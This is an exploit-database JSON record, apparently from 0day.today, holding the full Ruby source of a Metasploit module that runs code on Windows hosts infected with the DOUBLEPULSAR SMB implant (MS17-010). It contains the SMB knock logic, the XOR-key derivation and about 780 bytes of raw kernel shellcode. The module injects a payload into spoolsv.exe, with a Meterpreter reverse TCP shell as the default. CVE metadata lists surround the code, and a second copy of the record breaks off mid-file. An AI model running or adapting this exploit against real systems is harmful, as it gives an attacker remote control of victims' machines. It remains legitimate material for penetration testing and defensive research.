"kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-01T22:19:22", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-01T22:19:22", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-02] #"}, "lastseen": "2021-11-01T22:19:22", "differentElements": ["sourceData"], "edition": 62}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "c6a18643c2b736978f36ae1456573751", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-02T22:12:39", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-02T22:12:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-02T22:12:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 